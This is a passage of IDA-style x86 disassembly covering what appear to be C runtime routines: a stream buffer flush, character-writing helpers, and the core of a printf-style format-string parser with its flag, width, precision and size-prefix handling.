		mov	dword ptr [eax], 9

loc_406DBA:				; CODE XREF: sub_406D96+3Fj
		or	dword ptr [esi+0Ch], 20h
		or	eax, 0FFFFFFFFh
		jmp	loc_406EF3
; ---------------------------------------------------------------------------

loc_406DC6:				; CODE XREF: sub_406D96+17j
		test	al, 40h
		jz	short loc_406DD7
		call	sub_405D93
		mov	dword ptr [eax], 22h
		jmp	short loc_406DBA
; ---------------------------------------------------------------------------

loc_406DD7:				; CODE XREF: sub_406D96+32j
		push	ebx
		xor	ebx, ebx
		test	al, 1
		jz	short loc_406DF4
		test	al, 10h
		mov	[esi+4], ebx
		jz	loc_406E6E
		mov	ecx, [esi+8]
		and	eax, 0FFFFFFFEh
		mov	[esi], ecx
		mov	[esi+0Ch], eax

loc_406DF4:				; CODE XREF: sub_406D96+46j
		mov	eax, [esi+0Ch]
		and	eax, 0FFFFFFEFh
		or	eax, 2
		test	ax, 10Ch
		mov	[esi+0Ch], eax
		mov	[esi+4], ebx
		mov	[ebp+var_4], ebx
		jnz	short loc_406E38
		call	sub_408644
		add	eax, 20h
		cmp	esi, eax
		jz	short loc_406E24
		call	sub_408644
		add	eax, 40h
		cmp	esi, eax
		jnz	short loc_406E31

loc_406E24:				; CODE XREF: sub_406D96+80j
		push	[ebp+arg_4]
		call	sub_40DB00
		test	eax, eax
		pop	ecx
		jnz	short loc_406E38

loc_406E31:				; CODE XREF: sub_406D96+8Cj
		push	esi
		call	sub_40DABC
		pop	ecx

loc_406E38:				; CODE XREF: sub_406D96+74j
					; sub_406D96+99j
		test	word ptr [esi+0Ch], 108h
		push	edi
		jz	loc_406EC5
		mov	eax, [esi+8]
		mov	edi, [esi]
		lea	ecx, [eax+1]
		mov	[esi], ecx
		mov	ecx, [esi+18h]
		sub	edi, eax
		dec	ecx
		cmp	edi, ebx
		mov	[esi+4], ecx
		jle	short loc_406E79
		push	edi
		push	eax
		push	[ebp+arg_4]
		call	sub_40D9E0
		add	esp, 0Ch
		mov	[ebp+var_4], eax
		jmp	short loc_406EBB
; ---------------------------------------------------------------------------

loc_406E6E:				; CODE XREF: sub_406D96+4Dj
		or	eax, 20h
		mov	[esi+0Ch], eax
		or	eax, 0FFFFFFFFh
		jmp	short loc_406EF2
; ---------------------------------------------------------------------------

loc_406E79:				; CODE XREF: sub_406D96+C4j
		mov	ecx, [ebp+arg_4]
		cmp	ecx, 0FFFFFFFFh
		jz	short loc_406E9C
		cmp	ecx, 0FFFFFFFEh
		jz	short loc_406E9C
		mov	eax, ecx
		and	eax, 1Fh
		imul	eax, 28h
		mov	edx, ecx
		sar	edx, 5
		add	eax, dword_437EC0[edx*4]
		jmp	short loc_406EA1
; ---------------------------------------------------------------------------

loc_406E9C:				; CODE XREF: sub_406D96+E9j
					; sub_406D96+EEj
		mov	eax, offset dword_424BD0

loc_406EA1:				; CODE XREF: sub_406D96+104j
		test	byte ptr [eax+4], 20h
		jz	short loc_406EBB
		push	2
		push	ebx
		push	ebx
		push	ecx
		call	sub_40D301
		and	eax, edx
		add	esp, 10h
		cmp	eax, 0FFFFFFFFh
		jz	short loc_406EE0

loc_406EBB:				; CODE XREF: sub_406D96+D6j
					; sub_406D96+10Fj
		mov	eax, [esi+8]
		mov	cl, byte ptr [ebp+arg_0]
		mov	[eax], cl
		jmp	short loc_406EDB
; ---------------------------------------------------------------------------

loc_406EC5:				; CODE XREF: sub_406D96+A9j
		xor	edi, edi
		inc	edi
		push	edi
		lea	eax, [ebp+arg_0]
		push	eax
		push	[ebp+arg_4]
		call	sub_40D9E0
		add	esp, 0Ch
		mov	[ebp+var_4], eax

loc_406EDB:				; CODE XREF: sub_406D96+12Dj
		cmp	[ebp+var_4], edi
		jz	short loc_406EE9

loc_406EE0:				; CODE XREF: sub_406D96+123j
		or	dword ptr [esi+0Ch], 20h
		or	eax, 0FFFFFFFFh
		jmp	short loc_406EF1
; ---------------------------------------------------------------------------

loc_406EE9:				; CODE XREF: sub_406D96+148j
		mov	eax, [ebp+arg_0]
		and	eax, 0FFh

loc_406EF1:				; CODE XREF: sub_406D96+151j
		pop	edi

loc_406EF2:				; CODE XREF: sub_406D96+E1j
		pop	ebx

loc_406EF3:				; CODE XREF: sub_406D96+2Bj
		pop	esi
		leave
		retn
sub_406D96	endp


; =============== S U B	R O U T	I N E =======================================



sub_406EF6	proc near		; CODE XREF: sub_406F29+11p
					; sub_406F4D+22p ...
		test	byte ptr [ecx+0Ch], 40h
		jz	short loc_406F02
		cmp	dword ptr [ecx+8], 0
		jz	short loc_406F26

loc_406F02:				; CODE XREF: sub_406EF6+4j
		dec	dword ptr [ecx+4]
		js	short loc_406F12
		mov	edx, [ecx]
		mov	[edx], al
		inc	dword ptr [ecx]
		movzx	eax, al
		jmp	short loc_406F1E
; ---------------------------------------------------------------------------

loc_406F12:				; CODE XREF: sub_406EF6+Fj
		movsx	eax, al
		push	ecx
		push	eax
		call	sub_406D96
		pop	ecx
		pop	ecx

loc_406F1E:				; CODE XREF: sub_406EF6+1Aj
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_406F26
		or	[esi], eax
		retn
; ---------------------------------------------------------------------------

loc_406F26:				; CODE XREF: sub_406EF6+Aj
					; sub_406EF6+2Bj
		inc	dword ptr [esi]
		retn
sub_406EF6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_406F29	proc near		; CODE XREF: sub_406F97+853p
					; sub_406F97+880p ...

arg_0		= byte ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	esi
		mov	esi, eax
		jmp	short loc_406F44
; ---------------------------------------------------------------------------

loc_406F31:				; CODE XREF: sub_406F29+1Fj
		mov	ecx, [ebp+arg_8]
		mov	al, [ebp+arg_0]
		dec	[ebp+arg_4]
		call	sub_406EF6
		cmp	dword ptr [esi], 0FFFFFFFFh
		jz	short loc_406F4A

loc_406F44:				; CODE XREF: sub_406F29+6j
		cmp	[ebp+arg_4], 0
		jg	short loc_406F31

loc_406F4A:				; CODE XREF: sub_406F29+19j
		pop	esi
		pop	ebp
		retn
sub_406F29	endp


; =============== S U B	R O U T	I N E =======================================



sub_406F4D	proc near		; CODE XREF: sub_406F97+867p
					; sub_406F97+8CEp ...

arg_0		= dword	ptr  4

		test	byte ptr [edi+0Ch], 40h
		push	ebx
		push	esi
		mov	esi, eax
		mov	ebx, ecx
		jz	short loc_406F8D
		cmp	dword ptr [edi+8], 0
		jnz	short loc_406F8D
		mov	eax, [esp+8+arg_0]
		add	[esi], eax
		jmp	short loc_406F94
; ---------------------------------------------------------------------------

loc_406F67:				; CODE XREF: sub_406F4D+45j
		mov	al, [ebx]
		dec	[esp+8+arg_0]
		mov	ecx, edi
		call	sub_406EF6
		inc	ebx
		cmp	dword ptr [esi], 0FFFFFFFFh
		jnz	short loc_406F8D
		call	sub_405D93
		cmp	dword ptr [eax], 2Ah
		jnz	short loc_406F94
		mov	ecx, edi
		mov	al, 3Fh
		call	sub_406EF6

loc_406F8D:				; CODE XREF: sub_406F4D+Aj
					; sub_406F4D+10j ...
		cmp	[esp+8+arg_0], 0
		jg	short loc_406F67

loc_406F94:				; CODE XREF: sub_406F4D+18j
					; sub_406F4D+35j
		pop	esi
		pop	ebx
		retn
sub_406F4D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=1F8h


sub_406F97	proc near		; CODE XREF: sub_40307C+80p
					; sub_403643+53p ...

var_278		= dword	ptr -278h
var_274		= dword	ptr -274h
var_270		= dword	ptr -270h
var_26C		= dword	ptr -26Ch
var_268		= dword	ptr -268h
var_260		= dword	ptr -260h
var_25C		= byte ptr -25Ch
var_254		= dword	ptr -254h
var_250		= byte ptr -250h
var_24C		= dword	ptr -24Ch
var_248		= dword	ptr -248h
var_244		= dword	ptr -244h
var_240		= dword	ptr -240h
var_23C		= dword	ptr -23Ch
var_238		= dword	ptr -238h
var_234		= dword	ptr -234h
var_230		= byte ptr -230h
var_22F		= byte ptr -22Fh
var_22C		= dword	ptr -22Ch
var_228		= dword	ptr -228h
var_224		= dword	ptr -224h
var_220		= dword	ptr -220h
var_21C		= dword	ptr -21Ch
var_218		= dword	ptr -218h
var_211		= byte ptr -211h
var_210		= dword	ptr -210h
var_20C		= byte ptr -20Ch
var_D		= byte ptr -0Dh
var_C		= byte ptr -0Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		lea	ebp, [esp-1F8h]
		sub	esp, 278h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+1F8h+var_4], eax
		mov	eax, [ebp+1F8h+arg_0]
		push	ebx
		mov	ebx, [ebp+1F8h+arg_4]
		push	esi
		xor	esi, esi
		push	edi
		mov	edi, [ebp+1F8h+arg_C]
		push	[ebp+1F8h+arg_8]
		lea	ecx, [ebp+1F8h+var_25C]
		mov	[ebp+1F8h+var_228], eax
		mov	[ebp+1F8h+var_224], edi
		mov	[ebp+1F8h+var_244], esi
		mov	[ebp+1F8h+var_210], esi
		mov	[ebp+1F8h+var_238], esi
		mov	[ebp+1F8h+var_218], esi
		mov	[ebp+1F8h+var_234], esi
		mov	[ebp+1F8h+var_248], esi
		mov	[ebp+1F8h+var_23C], esi
		call	sub_402CAD
		cmp	[ebp+1F8h+var_228], esi
		jnz	short loc_407024

loc_406FF7:				; CODE XREF: sub_406F97+E5j
					; sub_406F97+138j ...
		call	sub_405D93
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		push	esi

loc_407007:				; CODE XREF: sub_406F97+948j
		call	sub_4034C7
		add	esp, 14h
		cmp	[ebp+1F8h+var_250], 0
		jz	short loc_40701C
		mov	eax, [ebp+1F8h+var_254]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_40701C:				; CODE XREF: sub_406F97+7Cj
		or	eax, 0FFFFFFFFh
		jmp	loc_4078F4
; ---------------------------------------------------------------------------

loc_407024:				; CODE XREF: sub_406F97+5Ej
		mov	eax, [ebp+1F8h+var_228]
		test	byte ptr [eax+0Ch], 40h
		jnz	loc_4070D5
		push	eax
		call	sub_408FE0
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_407073
		push	[ebp+1F8h+var_228]
		call	sub_408FE0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_407073
		push	[ebp+1F8h+var_228]
		call	sub_408FE0
		push	[ebp+1F8h+var_228]
		sar	eax, 5
		lea	esi, ds:437EC0h[eax*4]
		call	sub_408FE0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [esi]
		pop	ecx
		pop	ecx
		xor	esi, esi
		jmp	short loc_407078
; ---------------------------------------------------------------------------

loc_407073:				; CODE XREF: sub_406F97+A4j
					; sub_406F97+B2j
		mov	eax, offset dword_424BD0

loc_407078:				; CODE XREF: sub_406F97+DAj
		test	byte ptr [eax+24h], 7Fh
		jnz	loc_406FF7
		push	[ebp+1F8h+var_228]
		call	sub_408FE0
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_4070C6
		push	[ebp+1F8h+var_228]
		call	sub_408FE0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_4070C6
		push	[ebp+1F8h+var_228]
		call	sub_408FE0
		push	[ebp+1F8h+var_228]
		sar	eax, 5
		lea	esi, ds:437EC0h[eax*4]
		call	sub_408FE0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [esi]
		pop	ecx
		pop	ecx
		xor	esi, esi
		jmp	short loc_4070CB
; ---------------------------------------------------------------------------

loc_4070C6:				; CODE XREF: sub_406F97+F7j
					; sub_406F97+105j
		mov	eax, offset dword_424BD0

loc_4070CB:				; CODE XREF: sub_406F97+12Dj
		test	byte ptr [eax+24h], 80h
		jnz	loc_406FF7

loc_4070D5:				; CODE XREF: sub_406F97+94j
		cmp	ebx, esi
		jz	loc_406FF7
		mov	dl, [ebx]
		xor	ecx, ecx
		test	dl, dl
		mov	[ebp+1F8h+var_22C], esi
		mov	[ebp+1F8h+var_220], esi
		mov	[ebp+1F8h+var_24C], esi
		mov	[ebp+1F8h+var_211], dl
		jz	loc_4078E4

loc_4070F5:				; CODE XREF: sub_406F97+931j
		inc	ebx
		cmp	[ebp+1F8h+var_22C], 0
		mov	[ebp+1F8h+var_240], ebx
		jl	loc_4078E4
		mov	al, dl
		sub	al, 20h
		cmp	al, 58h
		ja	short loc_40711C
		movsx	eax, dl
		movzx	eax, ds:byte_41E4F8[eax]
		and	eax, 0Fh
		xor	esi, esi
		jmp	short loc_407120
; ---------------------------------------------------------------------------

loc_40711C:				; CODE XREF: sub_406F97+172j
		xor	esi, esi
		xor	eax, eax

loc_407120:				; CODE XREF: sub_406F97+183j
		movsx	eax, ds:byte_41E518[ecx+eax*8]
		push	7
		sar	eax, 4
		pop	ecx
		cmp	eax, ecx	; switch 8 cases
		mov	[ebp+1F8h+var_26C], eax
		ja	loc_4078B4	; default
		jmp	ds:off_40790F[eax*4] ; switch jump

loc_407140:				; DATA XREF: .text:off_40790Fo
		or	[ebp+1F8h+var_218], 0FFFFFFFFh ; jumptable 00407139 case 1
		mov	[ebp+1F8h+var_270], esi
		mov	[ebp+1F8h+var_248], esi
		mov	[ebp+1F8h+var_238], esi
		mov	[ebp+1F8h+var_234], esi
		mov	[ebp+1F8h+var_210], esi
		mov	[ebp+1F8h+var_23C], esi
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_40715B:				; CODE XREF: sub_406F97+1A2j
					; DATA XREF: .text:off_40790Fo
		movsx	eax, dl		; jumptable 00407139 case 2
		sub	eax, 20h
		jz	short loc_4071A1
		sub	eax, 3
		jz	short loc_407195
		sub	eax, 8
		jz	short loc_40718C
		dec	eax
		dec	eax
		jz	short loc_407183
		sub	eax, 3
		jnz	loc_4078B4	; default
		or	[ebp+1F8h+var_210], 8
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_407183:				; CODE XREF: sub_406F97+1D8j
		or	[ebp+1F8h+var_210], 4
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_40718C:				; CODE XREF: sub_406F97+1D4j
		or	[ebp+1F8h+var_210], 1
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_407195:				; CODE XREF: sub_406F97+1CFj
		or	[ebp+1F8h+var_210], 80h
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_4071A1:				; CODE XREF: sub_406F97+1CAj
		or	[ebp+1F8h+var_210], 2
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_4071AA:				; CODE XREF: sub_406F97+1A2j
					; DATA XREF: .text:off_40790Fo
		cmp	dl, 2Ah		; jumptable 00407139 case 3
		jnz	short loc_4071CF
		add	edi, 4
		mov	[ebp+1F8h+var_224], edi
		mov	edi, [edi-4]
		cmp	edi, esi
		mov	[ebp+1F8h+var_238], edi
		jge	loc_4078B4	; default
		or	[ebp+1F8h+var_210], 4
		neg	[ebp+1F8h+var_238]
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_4071CF:				; CODE XREF: sub_406F97+216j
		mov	eax, [ebp+1F8h+var_238]
		imul	eax, 0Ah
		movsx	ecx, dl
		lea	eax, [eax+ecx-30h]
		mov	[ebp+1F8h+var_238], eax
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_4071E4:				; CODE XREF: sub_406F97+1A2j
					; DATA XREF: .text:off_40790Fo
		mov	[ebp+1F8h+var_218], esi	; jumptable 00407139 case 4
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_4071EC:				; CODE XREF: sub_406F97+1A2j
					; DATA XREF: .text:off_40790Fo
		cmp	dl, 2Ah		; jumptable 00407139 case 5
		jnz	short loc_40720E
		add	edi, 4
		mov	[ebp+1F8h+var_224], edi
		mov	edi, [edi-4]
		cmp	edi, esi
		mov	[ebp+1F8h+var_218], edi
		jge	loc_4078B4	; default
		or	[ebp+1F8h+var_218], 0FFFFFFFFh
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_40720E:				; CODE XREF: sub_406F97+258j
		mov	eax, [ebp+1F8h+var_218]
		imul	eax, 0Ah
		movsx	ecx, dl
		lea	eax, [eax+ecx-30h]
		mov	[ebp+1F8h+var_218], eax
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_407223:				; CODE XREF: sub_406F97+1A2j
					; DATA XREF: .text:off_40790Fo
		cmp	dl, 49h		; jumptable 00407139 case 6
		jz	short loc_40726E
		cmp	dl, 68h
		jz	short loc_407265
		cmp	dl, 6Ch
		jz	short loc_407247
		cmp	dl, 77h
		jnz	loc_4078B4	; default
		or	[ebp+1F8h+var_210], 800h
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_407247:				; CODE XREF: sub_406F97+299j
		cmp	byte ptr [ebx],	6Ch
		jnz	short loc_40725C
		inc	ebx
		or	[ebp+1F8h+var_210], 1000h
		mov	[ebp+1F8h+var_240], ebx
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_40725C:				; CODE XREF: sub_406F97+2B3j
		or	[ebp+1F8h+var_210], 10h
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_407265:				; CODE XREF: sub_406F97+294j
		or	[ebp+1F8h+var_210], 20h
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_40726E:				; CODE XREF: sub_406F97+28Fj
		mov	al, [ebx]
		cmp	al, 36h
		jnz	short loc_40728B
		cmp	byte ptr [ebx+1], 34h
		jnz	short loc_40728B
		inc	ebx
		inc	ebx
		or	[ebp+1F8h+var_210], 8000h
		mov	[ebp+1F8h+var_240], ebx
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_40728B:				; CODE XREF: sub_406F97+2DBj
					; sub_406F97+2E1j
		cmp	al, 33h
		jnz	short loc_4072A6
		cmp	byte ptr [ebx+1], 32h
		jnz	short loc_4072A6
		inc	ebx
		inc	ebx
		and	[ebp+1F8h+var_210], 0FFFF7FFFh
		mov	[ebp+1F8h+var_240], ebx
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_4072A6:				; CODE XREF: sub_406F97+2F6j
					; sub_406F97+2FCj
		cmp	al, 64h
		jz	loc_4078B4	; default
		cmp	al, 69h
		jz	loc_4078B4	; default
		cmp	al, 6Fh
		jz	loc_4078B4	; default
		cmp	al, 75h
		jz	loc_4078B4	; default
		cmp	al, 78h
		jz	loc_4078B4	; default
		cmp	al, 58h
		jz	loc_4078B4	; default
		mov	[ebp+1F8h+var_26C], esi

loc_4072D9:				; CODE XREF: sub_406F97+1A2j
					; DATA XREF: .text:off_40790Fo
		lea	eax, [ebp+1F8h+var_25C]	; jumptable 00407139 case 0
		push	eax
		movzx	eax, dl
		push	eax
		mov	[ebp+1F8h+var_23C], esi
		call	sub_40CFC0
		pop	ecx
		test	eax, eax
		mov	al, [ebp+1F8h+var_211]
		pop	ecx
		jz	short loc_40730B
		mov	ecx, [ebp+1F8h+var_228]
		lea	esi, [ebp+1F8h+var_22C]
		call	sub_406EF6
		mov	al, [ebx]
		inc	ebx
		test	al, al
		mov	[ebp+1F8h+var_240], ebx
		jz	loc_4078CD

loc_40730B:				; CODE XREF: sub_406F97+359j
		mov	ecx, [ebp+1F8h+var_228]
		lea	esi, [ebp+1F8h+var_22C]
		call	sub_406EF6
		jmp	loc_4078B4	; default
; ---------------------------------------------------------------------------

loc_40731B:				; CODE XREF: sub_406F97+1A2j
					; DATA XREF: .text:off_40790Fo
		movsx	eax, dl		; jumptable 00407139 case 7
		cmp	eax, 64h
		jg	loc_407499
		jz	loc_407518
		cmp	eax, 53h
		jg	loc_4073E1
		jz	short loc_407392
		sub	eax, 41h
		jz	short loc_40734D
		dec	eax
		dec	eax
		jz	short loc_407381
		dec	eax
		dec	eax
		jz	short loc_40734D
		dec	eax
		dec	eax
		jnz	loc_40779C

loc_40734D:				; CODE XREF: sub_406F97+3A4j
					; sub_406F97+3ACj
		add	dl, 20h
		mov	[ebp+1F8h+var_270], 1
		mov	[ebp+1F8h+var_211], dl

loc_40735A:				; CODE XREF: sub_406F97+459j
					; sub_406F97+51Dj
		or	[ebp+1F8h+var_210], 40h
		cmp	[ebp+1F8h+var_218], esi
		lea	ebx, [ebp+1F8h+var_20C]
		mov	eax, 200h
		mov	[ebp+1F8h+var_21C], ebx
		mov	[ebp+1F8h+var_260], eax
		jge	loc_40753C
		mov	[ebp+1F8h+var_218], 6
		jmp	loc_40758A
; ---------------------------------------------------------------------------

loc_407381:				; CODE XREF: sub_406F97+3A8j
		test	word ptr [ebp+1F8h+var_210], 830h
		jnz	short loc_4073FE
		or	[ebp+1F8h+var_210], 800h
		jmp	short loc_4073FE
; ---------------------------------------------------------------------------

loc_407392:				; CODE XREF: sub_406F97+39Fj
		test	word ptr [ebp+1F8h+var_210], 830h
		jnz	short loc_4073A1
		or	[ebp+1F8h+var_210], 800h

loc_4073A1:				; CODE XREF: sub_406F97+401j
					; sub_406F97+694j
		mov	ecx, [ebp+1F8h+var_218]
		cmp	ecx, 0FFFFFFFFh
		jnz	short loc_4073AE
		mov	ecx, 7FFFFFFFh

loc_4073AE:				; CODE XREF: sub_406F97+410j
		add	edi, 4
		test	word ptr [ebp+1F8h+var_210], 810h
		mov	[ebp+1F8h+var_224], edi
		mov	edi, [edi-4]
		mov	[ebp+1F8h+var_21C], edi
		jz	loc_40777A
		cmp	edi, esi
		jnz	short loc_4073D2
		mov	eax, off_424928
		mov	[ebp+1F8h+var_21C], eax

loc_4073D2:				; CODE XREF: sub_406F97+431j
		mov	eax, [ebp+1F8h+var_21C]
		mov	[ebp+1F8h+var_23C], 1
		jmp	loc_40776F
; ---------------------------------------------------------------------------

loc_4073E1:				; CODE XREF: sub_406F97+399j
		sub	eax, 58h
		jz	loc_407623
		dec	eax
		dec	eax
		jz	short loc_40744B
		sub	eax, ecx
		jz	loc_40735A
		dec	eax
		dec	eax
		jnz	loc_40779C

loc_4073FE:				; CODE XREF: sub_406F97+3F0j
					; sub_406F97+3F9j
		add	edi, 4
		test	word ptr [ebp+1F8h+var_210], 810h
		mov	[ebp+1F8h+var_224], edi
		jz	short loc_407433
		movzx	eax, word ptr [edi-4]
		push	eax
		push	200h
		lea	eax, [ebp+1F8h+var_20C]
		push	eax
		lea	eax, [ebp+1F8h+var_220]
		push	eax
		call	sub_40DCF2
		add	esp, 10h
		test	eax, eax
		jz	short loc_407440
		mov	[ebp+1F8h+var_248], 1
		jmp	short loc_407440
; ---------------------------------------------------------------------------

loc_407433:				; CODE XREF: sub_406F97+473j
		mov	al, [edi-4]
		mov	[ebp+1F8h+var_20C], al
		mov	[ebp+1F8h+var_220], 1

loc_407440:				; CODE XREF: sub_406F97+491j
					; sub_406F97+49Aj
		lea	eax, [ebp+1F8h+var_20C]
		mov	[ebp+1F8h+var_21C], eax
		jmp	loc_40779C
; ---------------------------------------------------------------------------

loc_40744B:				; CODE XREF: sub_406F97+455j
		mov	eax, [edi]
		add	edi, 4
		cmp	eax, esi
		mov	[ebp+1F8h+var_224], edi
		jz	short loc_407485
		mov	ecx, [eax+4]
		cmp	ecx, esi
		jz	short loc_407485
		test	word ptr [ebp+1F8h+var_210], 800h
		movsx	eax, word ptr [eax]
		mov	[ebp+1F8h+var_21C], ecx
		jz	short loc_40747D
		cdq
		sub	eax, edx
		sar	eax, 1
		mov	[ebp+1F8h+var_23C], 1
		jmp	loc_407799
; ---------------------------------------------------------------------------

loc_40747D:				; CODE XREF: sub_406F97+4D3j
		mov	[ebp+1F8h+var_23C], esi
		jmp	loc_407799
; ---------------------------------------------------------------------------

loc_407485:				; CODE XREF: sub_406F97+4BEj
					; sub_406F97+4C5j
		mov	eax, off_424924
		mov	[ebp+1F8h+var_21C], eax
		push	eax

loc_40748E:				; CODE XREF: sub_406F97+680j
		call	sub_4046F0
		pop	ecx
		jmp	loc_407799
; ---------------------------------------------------------------------------

loc_407499:				; CODE XREF: sub_406F97+38Aj
		cmp	eax, 70h
		jg	loc_407628
		jz	loc_40761C
		cmp	eax, 65h
		jl	loc_40779C
		cmp	eax, 67h
		jle	loc_40735A
		cmp	eax, 69h
		jz	short loc_407518
		cmp	eax, 6Eh
		jz	short loc_4074E3
		cmp	eax, 6Fh
		jnz	loc_40779C
		test	byte ptr [ebp+1F8h+var_210], 80h
		mov	[ebp+1F8h+var_220], 8
		jz	short loc_407523
		or	[ebp+1F8h+var_210], 200h
		jmp	short loc_407523
; ---------------------------------------------------------------------------

loc_4074E3:				; CODE XREF: sub_406F97+52Bj
		mov	esi, [edi]
		add	edi, 4
		mov	[ebp+1F8h+var_224], edi
		call	sub_40DB7D
		test	eax, eax
		jz	loc_4078CD
		test	byte ptr [ebp+1F8h+var_210], 20h
		jz	short loc_407507
		mov	ax, word ptr [ebp+1F8h+var_22C]
		mov	[esi], ax
		jmp	short loc_40750C
; ---------------------------------------------------------------------------

loc_407507:				; CODE XREF: sub_406F97+565j
		mov	eax, [ebp+1F8h+var_22C]
		mov	[esi], eax

loc_40750C:				; CODE XREF: sub_406F97+56Ej
		mov	[ebp+1F8h+var_248], 1
		jmp	loc_4078A1
; ---------------------------------------------------------------------------

loc_407518:				; CODE XREF: sub_406F97+390j
					; sub_406F97+526j
		or	[ebp+1F8h+var_210], 40h

loc_40751C:				; CODE XREF: sub_406F97+69Cj
		mov	[ebp+1F8h+var_220], 0Ah

loc_407523:				; CODE XREF: sub_406F97+541j
					; sub_406F97+54Aj ...
		mov	ecx, [ebp+1F8h+var_210]
		test	cx, cx
		jns	loc_407672

loc_40752F:				; CODE XREF: sub_406F97+6E0j
		mov	eax, [edi]
		mov	edx, [edi+4]
		add	edi, 8
		jmp	loc_4076A7
; ---------------------------------------------------------------------------

loc_40753C:				; CODE XREF: sub_406F97+3D8j
		jnz	short loc_40754C
		cmp	dl, 67h
		jnz	short loc_40758A
		mov	[ebp+1F8h+var_218], 1
		jmp	short loc_40758A
; ---------------------------------------------------------------------------

loc_40754C:				; CODE XREF: sub_406F97:loc_40753Cj
		cmp	[ebp+1F8h+var_218], eax
		jle	short loc_407554
		mov	[ebp+1F8h+var_218], eax

loc_407554:				; CODE XREF: sub_406F97+5B8j
		cmp	[ebp+1F8h+var_218], 0A3h
		jle	short loc_40758A
		mov	esi, [ebp+1F8h+var_218]
		add	esi, 15Dh
		push	esi
		call	sub_407CFA
		test	eax, eax
		mov	dl, [ebp+1F8h+var_211]
		pop	ecx
		mov	[ebp+1F8h+var_24C], eax
		jz	short loc_407581
		mov	[ebp+1F8h+var_21C], eax
		mov	[ebp+1F8h+var_260], esi
		mov	ebx, eax
		jmp	short loc_407588
; ---------------------------------------------------------------------------

loc_407581:				; CODE XREF: sub_406F97+5DEj
		mov	[ebp+1F8h+var_218], 0A3h

loc_407588:				; CODE XREF: sub_406F97+5E8j
		xor	esi, esi

loc_40758A:				; CODE XREF: sub_406F97+3E5j
					; sub_406F97+5AAj ...
		mov	eax, [edi]
		add	edi, 8
		mov	[ebp+1F8h+var_278], eax
		mov	eax, [edi-4]
		mov	[ebp+1F8h+var_274], eax
		lea	eax, [ebp+1F8h+var_25C]
		push	eax
		push	[ebp+1F8h+var_270]
		movsx	eax, dl
		push	[ebp+1F8h+var_218]
		mov	[ebp+1F8h+var_224], edi
		push	eax
		push	[ebp+1F8h+var_260]
		lea	eax, [ebp+1F8h+var_278]
		push	ebx
		push	eax
		push	off_424F98
		call	sub_405753
		pop	ecx
		call	eax
		mov	edi, [ebp+1F8h+var_210]
		add	esp, 1Ch
		and	edi, 80h
		jz	short loc_4075E7
		cmp	[ebp+1F8h+var_218], esi
		jnz	short loc_4075E7
		lea	eax, [ebp+1F8h+var_25C]
		push	eax
		push	ebx
		push	off_424FA4
		call	sub_405753
		pop	ecx
		call	eax
		pop	ecx
		pop	ecx

loc_4075E7:				; CODE XREF: sub_406F97+634j
					; sub_406F97+639j
		cmp	[ebp+1F8h+var_211], 67h
		jnz	short loc_407606
		cmp	edi, esi
		jnz	short loc_407606
		lea	eax, [ebp+1F8h+var_25C]
		push	eax
		push	ebx
		push	off_424FA0
		call	sub_405753
		pop	ecx
		call	eax
		pop	ecx
		pop	ecx

loc_407606:				; CODE XREF: sub_406F97+654j
					; sub_406F97+658j
		cmp	byte ptr [ebx],	2Dh
		jnz	short loc_407616
		or	[ebp+1F8h+var_210], 100h
		inc	ebx
		mov	[ebp+1F8h+var_21C], ebx

loc_407616:				; CODE XREF: sub_406F97+672j
		push	ebx
		jmp	loc_40748E
; ---------------------------------------------------------------------------

loc_40761C:				; CODE XREF: sub_406F97+50Bj
		mov	[ebp+1F8h+var_218], 8

loc_407623:				; CODE XREF: sub_406F97+44Dj
		mov	[ebp+1F8h+var_244], ecx
		jmp	short loc_407649
; ---------------------------------------------------------------------------

loc_407628:				; CODE XREF: sub_406F97+505j
		sub	eax, 73h
		jz	loc_4073A1
		dec	eax
		dec	eax
		jz	loc_40751C
		sub	eax, 3
		jnz	loc_40779C
		mov	[ebp+1F8h+var_244], 27h

loc_407649:				; CODE XREF: sub_406F97+68Fj
		test	byte ptr [ebp+1F8h+var_210], 80h
		mov	[ebp+1F8h+var_220], 10h
		jz	loc_407523
		mov	al, byte ptr [ebp+1F8h+var_244]
		add	al, 51h
		mov	[ebp+1F8h+var_230], 30h
		mov	[ebp+1F8h+var_22F], al
		mov	[ebp+1F8h+var_234], 2
		jmp	loc_407523
; ---------------------------------------------------------------------------

loc_407672:				; CODE XREF: sub_406F97+592j
		test	cx, 1000h
		jnz	loc_40752F
		add	edi, 4
		test	cl, 20h
		jz	short loc_40769A
